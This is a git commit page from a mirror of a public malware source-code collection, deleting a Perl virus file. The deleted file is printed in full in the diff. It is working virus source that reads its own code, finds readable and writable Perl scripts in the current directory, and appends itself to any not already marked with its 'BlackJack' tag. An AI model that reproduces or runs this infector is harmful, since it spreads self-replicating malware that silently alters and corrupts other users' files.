mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2024-12-18 09:26:09 +00:00
Delete Virus.Perl.WhiteNoise.a
na
This commit is contained in:
parent
d22995b95e
commit
ace9e7415a
@ -1,23 +0,0 @@
|
||||
open(File,$0);
|
||||
@Vir=<File>;
|
||||
#BlackJack
|
||||
@Virus=@Vir[-23...-1];
|
||||
close(File);
|
||||
foreach $FileName (<*>)
|
||||
{
|
||||
if ((-r $FileName) && (-w $FileName) && (-f $FileName))
|
||||
{
|
||||
open(fuck, "$FileName");
|
||||
@aFucks=<fuck>;
|
||||
close(fuck);
|
||||
if ((@aFucks[0] =~ "perl") || (@aFucks[1] =~ "perl"))
|
||||
{
|
||||
if ( not (@aFucks[-21] =~ "BlackJack"))
|
||||
{
|
||||
open(fuck, ">>$FileName");
|
||||
print fuck @Virus;
|
||||
close(fuck);
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
Loading…
Reference in New Issue
Block a user